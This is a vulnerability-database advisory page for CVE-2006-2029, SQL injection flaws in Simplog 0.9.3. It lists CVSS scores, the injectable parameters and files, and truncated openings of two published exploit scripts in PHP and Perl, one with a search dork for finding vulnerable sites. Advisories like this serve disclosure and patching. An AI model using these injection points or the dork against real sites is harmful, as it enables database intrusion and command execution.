6.4
CVSSv2

CVE-2006-2029

Published: 26/04/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 650
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

Multiple SQL injection vulnerabilities in Jeremy Ashcraft Simplog 0.9.3 and previous versions allow remote malicious users to execute arbitrary SQL commands via the (1) tid parameter in (a) preview.php; the (2) cid, (3) pid, and (4) eid parameters in (b) archive.php; and the (5) pid parameter in (c) comments.php.

Vulnerable Product Search on Vulmon Subscribe to Product

simplog simplog

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "Simplog <= 092 \"s\" remote cmmnds xctn\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; echo "dork: intext:\"Powered by simplog\"\r\n\r\n"; if ($argc<5) { echo "Usage: php "$argv[0]" host path location cmd OPTIONS\r\n"; echo "host: t ...
#!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedxcom web: wwwnukedxcom #Original advisory: wwwnukedxcom/?viewdoc=25 #Usage: simplogpl <host> <path> use IO::Socket; if(@ARGV != 2) { usage(); } else { exploit(); } sub header() { print "\n- NukedX Security Adviso ...